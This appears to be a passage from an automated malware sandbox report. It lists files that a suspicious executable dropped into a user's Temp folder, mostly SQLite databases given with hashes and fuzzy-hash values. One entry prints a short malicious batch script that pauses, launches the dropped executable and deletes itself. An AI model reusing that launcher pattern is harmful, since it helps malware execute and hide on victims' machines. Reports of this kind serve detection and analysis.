                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\HXQx4Q9PfK

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                Category:dropped
                                                                                Size (bytes):28672
                                                                                Entropy (8bit):2.5793180405395284
                                                                                Encrypted:false
                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\HoDFPlWvZd

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\HvAXyp2rZW

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\I8vxyDbDpd

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\IVURXVCI8F

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.5712781801655107
                                                                                Encrypted:false
                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\InC7ZpJgaB

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\J00mYwIGp6

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\JO8BQJzkoW

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                Category:dropped
                                                                                Size (bytes):28672
                                                                                Entropy (8bit):2.5793180405395284
                                                                                Encrypted:false
                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\LCsNmMuUVh

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.5712781801655107
                                                                                Encrypted:false
                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\Lze6mEjeRi

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\M1cWFCMEcy.bat

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe
                                                                                File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):213
                                                                                Entropy (8bit):5.2993624981310985
                                                                                Encrypted:false
                                                                                SSDEEP:6:hCijTg3Nou1SV+DE718RkASKOZG1wkn23fVahkh:HTg9uYDE72vIf9D
                                                                                MD5:9A33FED9F6810C619427FB761D4529FE
                                                                                SHA1:591636B03F2A6A38AEF00221BABED2226E9B77AC
                                                                                SHA-256:728825B20499D503FE0D1FF61EDF47F999AC7FB37A622425FD4E7D8453E5075F
                                                                                SHA-512:A1BAC1B871AC12393E14BE0C6F7EDFEEB63318E5409DAFD9DAA04BFF5D37BD55D47E005C96CF80B4B67E1788C4C774696F1967636E6CC7ED0DF69899BA6082C7
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\M1cWFCMEcy.bat"

                                                                                C:\Users\user\AppData\Local\Temp\M3mdCaYJjU

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\MAIZhEJKAR

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                Category:dropped
                                                                                Size (bytes):28672
                                                                                Entropy (8bit):2.5793180405395284
                                                                                Encrypted:false
                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\MFuTPAhOwG

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\MSMCtLJRhT

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\MTuFNAkTNF

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\N9ERNjznv1

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.5707520969659783
                                                                                Encrypted:false
                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\NKMrI06Vrb

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\NKk0vCtF1T

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\NSj4NHBz4y

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\NkktZG23aN

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.5712781801655107
                                                                                Encrypted:false
                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\O3PL30Ce6N

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                Category:dropped
                                                                                Size (bytes):28672
                                                                                Entropy (8bit):2.5793180405395284
                                                                                Encrypted:false
                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\O4SifpQnTI

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                Category:dropped
                                                                                Size (bytes):28672
                                                                                Entropy (8bit):2.5793180405395284
                                                                                Encrypted:false
                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\O8q4R6CSPh

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
